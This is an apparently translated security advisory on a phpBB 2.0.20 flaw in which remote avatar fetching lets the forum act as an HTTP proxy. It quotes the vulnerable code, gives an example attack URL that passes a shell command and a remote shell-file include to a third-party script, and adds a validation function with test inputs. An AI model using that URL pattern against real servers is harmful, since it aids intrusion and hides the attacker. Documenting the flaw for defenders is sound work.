phpBB can be used as an HTTP proxy

2006-05-26T00:00:00
ID MYHACK58:6220069344
Type myhack58
Reporter Anonymous
Modified 2006-05-26T00:00:00

Description

Affected system: phpBB Group phpBB 2.0.20

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 17965

phpBB is a widely used open-source web forum program written in PHP. It supports multiple database backends such as Oracle, MSSQL, MySQL, PostgreSQL, and so on.

phpBB has an input validation vulnerability in its handling of user requests. A remote attacker could exploit it to use the phpBB server as an HTTP proxy, hiding the real source of CGI attacks.

In the phpBB usercp_avatar.php file, lines 125-153:

    ...
    // Remote avatar: the user-supplied value is split into host, port and path
    if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )
    {
        if ( empty($url_ary[4]) )
        {
            $error = true;
            $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];
            return;
        }

        // Everything after the first "/" is used as the request path, unchecked
        $base_get = '/' . $url_ary[4];
        $port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;

        if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )
        {
            $error = true;
            $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL'];
            return;
        }

        // The server itself sends the GET request to the supplied host
        @fputs($fsock, "GET $base_get HTTP/1.1\r\n");
        @fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");
        @fputs($fsock, "Connection: close\r\n\r\n");

        unset($avatar_data);
        while( !@feof($fsock) )
        {
            $avatar_data .= @fread($fsock, $board_config['avatar_filesize']);
        }
        @fclose($fsock);
    ...

phpBB does not check whether the user-supplied value ends with an image file extension, nor whether the supplied string contains the "&" and "?" characters, so an attacker can submit a value similar to the following:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt

phpBB will perform the following GET request:

GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0
HOST: some_vulnerable.host
Connection: close

phpBB is thus used as an HTTP proxy to access another web server.
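The two missing checks described above (an image extension at the end of the value, no "&" or "?"), written as a validation step to run before the fsockopen() call. This is an added example, not phpBB's code or the vendor's fix; the function name is_safe_remote_avatar_url, the extension list, and the port and control-character rules are assumptions that go beyond the two checks the advisory names.

```php
<?php
// Added example (PHP 7+), not phpBB code. The function name, extension list,
// port rule and control-character rule are assumptions made for illustration.
function is_safe_remote_avatar_url(string $url): bool
{
    // CR/LF or spaces would let the value break out of the hand-built
    // "GET $base_get HTTP/1.1" request line.
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {
        return false;
    }
    // The characters the advisory names, plus "#": no query string at all.
    if (strpbrk($url, '?&#') !== false) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'], $parts['path'])) {
        return false;
    }
    if (strtolower($parts['scheme']) !== 'http' || isset($parts['user'])) {
        return false;
    }
    // Only the default HTTP port, so the fetch cannot be aimed at other services.
    if (isset($parts['port']) && $parts['port'] !== 80) {
        return false;
    }
    // The path must end in an image extension.
    return preg_match('/^\/[\w\-.\/]+\.(gif|jpe?g|png)$/i', $parts['path']) === 1;
}

// Constructed sample inputs; the second is the value quoted in the advisory.
$samples = [
    'http://images.example.org/avatars/user1.png',
    'http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt',
    'http://images.example.org/avatar.gif?x=1',
    'http://images.example.org:8080/avatar.gif',
    "http://images.example.org/a.gif\r\nX-Injected: 1",
];
foreach ($samples as $s) {
    $verdict = is_safe_remote_avatar_url($s) ? 'ACCEPT' : 'REJECT';
    echo $verdict, ' ', json_encode($s), "\n";
}
```

The server still makes an outbound request for accepted values, so the response should also be checked to be an image before it is stored.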

<*source: rgod (rgod@autistici.org)

Links:
http://marc.theaimsgroup.com/?l=bugtraq&m=114746905805341&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=114771082404483&w=2
*>

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

phpBB Group
-----------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page to get the latest version:

http://www.phpbb.com/